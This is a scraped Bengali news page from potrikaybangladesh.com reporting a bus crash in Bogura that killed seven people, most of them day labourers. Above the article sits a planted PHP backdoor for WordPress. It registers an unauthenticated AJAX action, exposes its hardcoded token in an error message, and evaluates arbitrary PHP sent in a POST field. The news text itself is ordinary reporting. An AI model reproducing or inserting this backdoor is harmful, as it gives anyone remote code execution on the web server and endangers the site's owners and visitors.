// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বগুড়ায় বাসচাপায় ৭ জন নিহত, অধিকাংশই দিনমজুর | potrikaybangladesh.com
Thursday, October 1, 2026
Homeঅপরাধবগুড়ায় বাসচাপায় ৭ জন নিহত, অধিকাংশই দিনমজুর

বগুড়ায় বাসচাপায় ৭ জন নিহত, অধিকাংশই দিনমজুর

বগুড়া সদর উপজেলায় বাসচাপায় সাতজন নিহত হয়েছেন। আহত অবস্থায় চিকিৎসাধীন আরও অন্তত ১৫ জন। তাৎক্ষণিকভাবে তাদের পরিচয় জানা যায়নি।

আজ শুক্রবার সকালে উপজেলার এরুলিয়া বাজার এলাকায় বগুড়া-নওগাঁ মহাসড়কে এই দুর্ঘটনা ঘটে।

বগুড়া ফায়ার সার্ভিস ও সিভিল ডিফেন্স স্টেশনের সিনিয়র স্টেশন অফিসার মো. শহীদুল ইসলাম দ্য ডেইলি স্টারকে জানিয়েছেন, বাসচাপায় ঘটনাস্থলেই তিনজন প্রাণ হারিয়েছেন।

বগুড়া মেডিকেল ফাঁড়ির সহকারী উপপরিদর্শক (এএসআই) কৃষ্ণ দ্য ডেইলি স্টারকে বলেন, ‘হাসপাতালে নিয়ে আসার পরে ডাক্তার তিনজনকে মৃত ঘোষণা করেন। পরে আরও একজন চিকিৎসাধীন অবস্থায় মারা গেছেন।’

শহীদুল আরও জানান, আহত ১৮ জনকে উদ্ধার করে হাসপাতালে ভর্তি করা হয়।

‘ঢাকা থেকে নওগাঁর উদ্দেশে ছেড়ে আসা শাহ ফতেহ আলী পরিবহনের একটি বাস আজ সকাল ৬টার দিকে এরুলিয়া এলাকায় একটি মোটরসাইকেলকে জায়গা দিতে গিয়ে দুর্ঘটনার কবলে পড়ে,’ প্রত্যক্ষদর্শীদের বরাত দিয়ে বলেন শহীদুল।

তিনি আরও বলেন, ‘বাসটি প্রথমে রাস্তার পাশের একটি বৈদ্যুতিক খুঁটিকে ধাক্কা দেয়, এরপর রাস্তার পাশে থাকা মানুষদের চাপা দেয়। হতাহত অধিকাংশই দিনমজুর ও গৃহস্থ।’

তবে বাসের কোনো যাত্রীদের তেমন আহত হননি, বলেন ফায়ার সার্ভিসের এই কর্মকর্তা।

শহীদুল বলেন, ‘ঘটনাস্থলেই তিনজন মারা গেছেন। স্থানীয় বাসিন্দা ও ফায়ার সার্ভিসের তিনটি ইউনিট প্রায় ১৮ জন শ্রমিক ও গৃহস্থকে উদ্ধার করে বগুড়ার শহীদ জিয়াউর রহমান মেডিকেল কলেজ হাসপাতালে ভর্তি করে।’

এ প্রসঙ্গে বগুড়া সদর উপজেলা নির্বাহী কর্মকর্তা (ইউএনও) আব্দুল ওয়াজেদ ডেইলি স্টারকে বলেন, ‘স্থানীয়রা দুর্ঘটনাস্থলের সড়ক অবরোধ করে রেখেছেন। তাদের দাবি একাধিক স্পিড ব্রেকার নির্মাণ করলে এখানে দুর্ঘটনা ঘটবে না।’

সড়ক ও জনপদের নির্বাহী প্রকৌশলী ঘটনাস্থলে উপস্থিত হয়ে আশ্বাস দেন, আজকের মধ্যেই স্পিড ব্রেকার স্থাপন করা হবে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments